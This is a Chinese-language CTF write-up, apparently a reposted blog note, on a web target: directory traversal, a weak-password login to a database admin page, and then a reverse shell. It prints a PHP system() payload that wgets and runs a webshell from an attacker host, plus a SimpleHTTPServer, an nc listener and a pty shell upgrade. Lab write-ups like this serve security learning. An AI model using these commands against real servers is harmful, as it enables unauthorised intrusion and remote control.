ctf-web-目录遍历(拿到www-data用户权限)注入思路笔记

目录遍历漏洞介绍

路径遍历攻击(也称为目录遍历)旨在访问存储在web根文件夹之外的文件和目录。通过操纵带有“点-斜线(..)”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。

需要注意的是,系统操作访问控制(如在微软Windows操作系统上锁定或使用文件)限制了对文件的访问权限。

这种攻击也称为“点-点斜线”、“目录遍历”、“目录爬升”和“回溯”。

注入步骤

  1. 信息探测:
    1. image
    2. 发现数据库管理界面image
  2. 漏洞扫描
    1. 使用owasp-zap进行扫描
      1. image
      2. image
  3. 敏感页面上传、执行shell
    1. -- dbadmin敏感目录有敏感页面,浏览器访问,使用弱口令尝试登陆;发现弱口令存在,并登陆成功!
    2. 生成webshell:
      1. imageimage

    3. 登陆页面之后查找可利用的写webshell的点;
    4. 新建数据库,数据表,字段(写入<?php system("cd /tmp;wget http:/ /ip:port/webshell.php;chmod +x webshell.php;php webshell");?> )
      1. image
      2. image
    5. 创建服务器用于靶场机器下载对应webshell:-- python -m "SimpleHTTPServer”,注意服务器端口和shell地址端口一致
    6. 创建监听:启动监听nc:nc –nlvp  端口号
    7. 执行shell:image
    8. 获得反弹shell
    9. 启动终端优化shell:python –c ‘’import pty;pty.spawn(‘/bin/bash’)
  4. 小结:
    1. image
原文地址:https://www.cnblogs.com/zw7889/p/13594878.html